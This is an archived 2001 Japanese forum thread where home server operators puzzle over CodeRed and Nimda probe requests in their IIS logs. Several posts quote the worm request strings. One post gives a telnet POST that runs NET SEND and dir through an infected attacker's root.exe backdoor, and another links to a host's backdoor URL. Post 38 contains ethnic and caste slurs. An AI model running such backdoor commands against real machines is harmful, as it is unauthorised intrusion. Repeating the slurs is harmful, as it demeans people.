2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

おーい!自宅でWebサーバ立ててるやつー!IIS

1 :増殖中・・・:01/09/22 23:21
GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXX
CodeRedってWormらしいが、
GET /scripts/..?../winnt/system32/cmd.exe HTTP/1.0" 404 218
GET /MSADC/root.exe?/c+dir HTTP/1.1" 404 252
ってログが残ってるんだが、なんなんだー!?
これもWormか??
IIS使ってないが、ものすごく気になる気になる。

2 :名無しさん@お腹いっぱい。:01/09/22 23:22
このスレの上下のスレでも読めや。

3 :糞スレ増殖中・・・:01/09/22 23:23
回線切れ。

4 :名無しさん@お腹いっぱい。:01/09/22 23:24
にむだだよ。
マックでサーバ立ててる基地外の漏れとしては
どこ吹く風、って感じだが。

5 :名無しさん@お腹いっぱい。:01/09/22 23:27
どうでもいいが
>CodeRedってWormらしいが、
>これもWormか??
ってなんか変!!

6 :増殖中・・・:01/09/22 23:32
これがにむだだったのね。スマソスマソ

>>5
CodeRedって言うの名の

7 :まっか:01/09/22 23:40
マックは感染しなくとも、中継に使われる。
安心するのは早いであるです。

8 :まっかっか:01/09/23 00:23
>>7
その手の情報って、ほんと少ないし、
あってもまっかは対岸の火としか見てないよね。

9 : :01/09/23 01:30
キムチ、いい加減気付いてくれ。お前からの攻撃がうざくて仕方がない。
http://210.216.41.72/scripts/root.exe?/c+dir%20e:\winnt

10 :名無しさん@お腹いっぱい。:01/09/23 01:51
GET 〜 の後ろが 404とか 500ならいいけど、
200を返していたらあなたの マシンもニムダに感染している可能性がある。

11 :名無しさん@お腹いっぱい。:01/09/23 01:52
>>1
http://www.geocities.co.jp/Milano-Killer/6419/1.swf

12 :名無しさん@お腹いっぱい。:01/09/23 01:59
CodeRedがまた目立ってきた。
仕掛けてくる相手には root.exeがあるはずだから、こうしてやる。

telnet ***.***.***.*** 80
POST /scripts/root.exe HTTP/1.0
Content-Length: 69

NET SEND * "*** Your Server seems to be cracked by CodeRed !!"
dir

13 :名無しさん@お腹いっぱい。:01/09/23 02:02
>>12
ネタ?
telnetはいらないじゃん。

14 :名無しさん@お腹いっぱい。:01/09/23 02:31
>>13
おまえこそネタ?
telnet 80 なしでどうやって相手につなぐのよ。

15 :名無しさん@お腹いっぱい。:01/09/23 02:36
UNIX上のコンソール端末の話?

16 :名無しさん@お腹いっぱい。:01/09/23 02:50
telnetってものがどういうものかわかってない人間が約一名いるな。
よく知らないものに対し、「ネタ?」とか言うのはやめたほうがいいぞ

17 :名無しさん@お腹いっぱい。 :01/09/23 03:20
telnet 80 とコマンドラインで入力する以外に
tcpポート80へ接続する方法はないのか?

ブラウザもtelnet 80を使ってるのか?

コマンドとプロトコルの区別ついてる?

18 : :01/09/23 03:31
>>17
御意. さらし上げたら?

19 :名無しさん@お腹いっぱい。:01/09/23 05:21
ネットワーク系のテストする時などに任意のポートに繋いで操作するのに
telnet コマンドを使うのってunix屋なら常識だと思うが。

httpdとお話できるようになって一人前かな

20 :名無しさん@お腹いっぱい。:01/09/23 05:34
つまりこうすれば良かったんだよ

TCPポートの80開きたいんだけど ***.***.***.*** 80
POST /scripts/root.exe HTTP/1.0
Content-Length: 69

NET SEND * "*** Your Server seems to be cracked by CodeRed !!"
dir

「TCPポートの80開きたいんだけど」コマンドが重要。

21 :名無しさん@お腹いっぱい。:01/09/23 05:44
>>17
>>12はごく一般的だと思うが。
それとも>>17はコレをやるのにいちいちブラウザ使うのか?

22 :名無しさん@お腹いっぱい。:01/09/23 07:37
晒しage

23 :このスレ痛い・・・:01/09/23 08:14
全て>>1の責任だ!
http://www.geocities.co.jp/Milano-Killer/6419/1.swf

24 :名無しさん@お腹いっぱい。:01/09/23 08:33
http://isweb33.infoseek.co.jp/play/liloatx/yoshi.html

25 :名無しさん@お腹いっぱい。:01/09/23 09:04
>>24
腹が痛い

26 ::01/09/23 11:53
[23/Sep/2001:08:43:57 +0900]
[23/Sep/2001:09:19:19 +0900]
[23/Sep/2001:09:25:01 +0900] .
[23/Sep/2001:09:57:14 +0900]
[23/Sep/2001:10:17:53 +0900]
[23/Sep/2001:10:41:00 +0900]
[23/Sep/2001:10:52:06 +0900] .
[23/Sep/2001:10:56:24 +0900]
[23/Sep/2001:10:59:05 +0900] .
[23/Sep/2001:11:17:27 +0900]
[23/Sep/2001:11:23:37 +0900]
[23/Sep/2001:11:31:53 +0900]
[23/Sep/2001:11:32:01 +0900] .
[23/Sep/2001:11:48:23 +0900]

この2、3時間の間にきたCodeRed
おさまらんのう。。

27 :名無しさん@お腹いっぱい。:01/09/23 15:41
>>19
>httpdとお話できるようになって一人前かな

そんな一人前はいらんちゅーねん。

28 :名無しさん@お腹いっぱい。:01/09/24 02:36
そんなことより聞いてくれよ>>httpdよ。

29 :名無しさん@お腹いっぱい。:01/09/24 02:47
つーかGETはともかく、POSTはtelnet系ツールが当たり前だな

30 :名無しさん@お腹いっぱい:01/09/24 05:10
なんとか 代 白
[2001/09/24 3:58:10] --unknown-- from: 202.132.46.28 /
[2001/09/24 4:22:26] --unknown-- from: 202.16.214.48 / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:22:27] --unknown-- from: 202.16.214.48 / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:22:27] --unknown-- from: 202.16.214.48 / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:22:28] --unknown-- from: 202.16.214.48 / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:22:28] --unknown-- from: 202.16.214.48 / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:22:29] --unknown-- from: 202.16.214.48 / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:22:29] --unknown-- from: 202.16.214.48 / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:39:38] --unknown-- from: 202.16.214.48 / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:39:39] --unknown-- from: 202.16.214.48 / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:39:39] --unknown-- from: 202.16.214.48 / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:39:40] --unknown-- from: 202.16.214.48 / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:39:40] --unknown-- from: 202.16.214.48 / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 5:07:52] --unknown-- from: 202.29.26.20 /
[2001/09/24 5:07:57] --unknown-- from: 202.29.26.20 /

31 :名無しさん@お腹いっぱい。:01/09/24 05:21
telnetめんどーだし、netcatもあるよね

32 :名無しさん@お腹いっぱい。:01/09/24 20:33
 telnetマニアの方々へ質問があります。

(1)12のように、コマンドをPOSTで送っても
   root.exeは順次それを実行できるのですか?
(2)サーバと会話するのにHTTP1.1を使わないのはなぜですか?
   切られちゃうじゃないですか?

33 :名無しさん@お腹いっぱい。:01/09/25 13:47
>>32
POSTで送って実行できるかどうかは相手次第なんだが、
実験してみてはどうかな。
HTTP1.1を使わない→切られちゃう ってのは、 Keep-Alive が
使えない、ということかな。
HTTP1.1を使うのは何かと面倒だから、HTTP1.0を使うのよん。
確かに一回のリクエスト→応答単位で切れるけど。目的は達成
できるでしょう。

ポートと直接ゴニョゴニョするためにTelnet使うんだったら、おすすめは
MSのWindowsについてくるTelnet。余計なこと一切しないから。
Telnet端末としては最低だけど、ツールとしては便利

ソケット直接たたいて、ポートと会話するプログラムとか書いて見るのも
入門としてお勧めだぞ。ツール作成の第一歩だ。

別にTelnetマニアじゃないけどね。

34 :先行者キャノン  :01/09/25 13:50
便所にいきたい。

35 :先行者キャノン  :01/09/25 13:50
小便したいぜ

36 :先行者キャノン  :01/09/25 13:50
まじでもれそう。小便したい。まじでもれそう。小便したい。まじでもれそう。小便したい。まじでもれそう。小便したい。
まじでもれそう。小便したい。まじでもれそう。小便したい。まじでもれそう。小便したい。
まじでもれそう。小便したい。まじでもれそう。小便したい。まじでもれそう。小便したい。
まじでもれそう。小便したい。まじでもれそう。小便したい。まじでもれそう。小便したい。
まじでもれそう。小便したい。まじでもれそう。小便したい。まじでもれそう。小便したい。まじでもれそう。小便したい。まじでもれそう。小便したい。
まじでもれそう。小便したい。まじでもれそう。小便したい。まじでもれそう。小便したい。
まじでもれそう。小便したい。まじでもれそう。小便したい。まじでもれそう。小便したい。
まじでもれそう。小便したい。まじでもれそう。小便したい。まじでもれそう。小便したい。
まじでもれそう。小便したい。

37 :先行者キャノン  :01/09/25 13:51
まじでもれそう。小便したい。まじでもれそう。小便したい。まじでもれそう。小便したい。まじでもれそう。小便したい。
まじでもれそう。小便したい。まじでもれそう。小便したい。まじでもれそう。小便したい。
まじでもれそう。小便したい。まじでもれそう。小便したい。まじでもれそう。小便したい。
まじでもれそう。小便したい。まじでもれそう。小便したい。まじでもれそう。小便したい。
まじでもれそう。小便したい。まじでもれそう。小便したい。まじでもれそう。小便したい。まじでもれそう。小便したい。まじでもれそう。小便したい。
まじでもれそう。小便したい。まじでもれそう。小便したい。まじでもれそう。小便したい。
まじでもれそう。小便したい。まじでもれそう。小便したい。まじでもれそう。小便したい。
まじでもれそう。小便したい。まじでもれそう。小便したい。まじでもれそう。小便したい。
まじでもれそう。小便したい。

38 :先行者キャノン  :01/09/25 13:55
>>20

は馬鹿か?何いいたいのかわからん。

telnet 80
でいいだろ。ひとまずテストすんなら。

>>20 は、
おまえ本当に大馬鹿エタ、ヒニン、チョンコウだな

39 :名無しさん@お腹いっぱい。:01/09/25 13:59
>>38

なかなか的確な突っ込みを入れている姿を見て、
ちょっと関心してたけど、あちらこちらの書き込みで
君も結局…なことがわかったよ。
買いかぶった俺が馬鹿なのだが。残念だ。

40 :無月:01/09/25 15:10
GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXX
CodeRedが攻撃してくるとwebサービスをしてる以上
ログにあがってくるよ、ウェブサバーは要求された
ファイルがないので「そんなファイルなぃすっ!」
って答えてるんです。一応聞かれたことをlogに出してます。

41 :名無しさん@お腹いっぱい。:01/09/25 18:39
>>38

可哀想に、よほど痛かったらしい。
みじめ。

42 :名無しさん@お腹いっぱい。:01/09/25 19:26
先行者キャノンてレベル高いの?
書いてること見たら丸出しなんだけど。
他人?

43 :名無しさん@お腹いっぱい。:01/09/25 19:28
少なくとも人間的レベルは低い

44 :名無しさん@お腹いっぱい。:01/09/25 22:10
ネタにマジ煽りするあたりはアホ(プッ

45 :名無しさん@お腹いっぱい。:01/09/25 23:50
不自由な人

46 :素直に捨てろ:01/09/26 17:17

●ZDNN:IISは捨てなさい――Gartnerが企業に警告
http://www.zdnet.co.jp/news/0109/26/e_iis.html

●CNET Japan Tech News:ワーム対策の第一歩はMS『IIS』の使用中止
http://japan.cnet.com/News/2001/Item/010926-2.html?mn

47 :名無しさん@お腹いっぱい。:01/09/26 18:04
いまさら「先行者キャノン」と名乗ってうれしがるような人。
きっと、きのうきょう先行者を知ったのでしょう。

13 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)